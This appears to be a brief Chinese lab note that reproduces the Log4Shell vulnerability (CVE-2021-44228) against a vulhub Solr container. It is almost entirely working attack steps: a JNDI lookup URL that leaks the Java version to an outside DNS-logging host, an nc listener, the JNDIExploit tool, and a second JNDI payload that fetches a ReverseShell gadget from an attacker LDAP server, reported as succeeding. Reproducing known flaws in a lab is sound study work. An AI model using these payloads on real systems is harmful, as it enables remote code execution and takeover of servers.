环境启动
cd vulhub-master
cd ./log4j/CVE-2021-44228
docker-compose up -d
docker-compose ps
漏洞复现
http://192.168.164.130:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.7nzel6.ceye.io}
1.kali开启监听
nc -nvlp 9999
2.使用log4j
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.6.239
3.浏览器访问
http://192.168.164.130:8983/solr/admin/cores?action=${jndi:ldap://192.168.6.239:1389/Basic/ReverseShell/192.168.164.134/9999}
反弹shell成功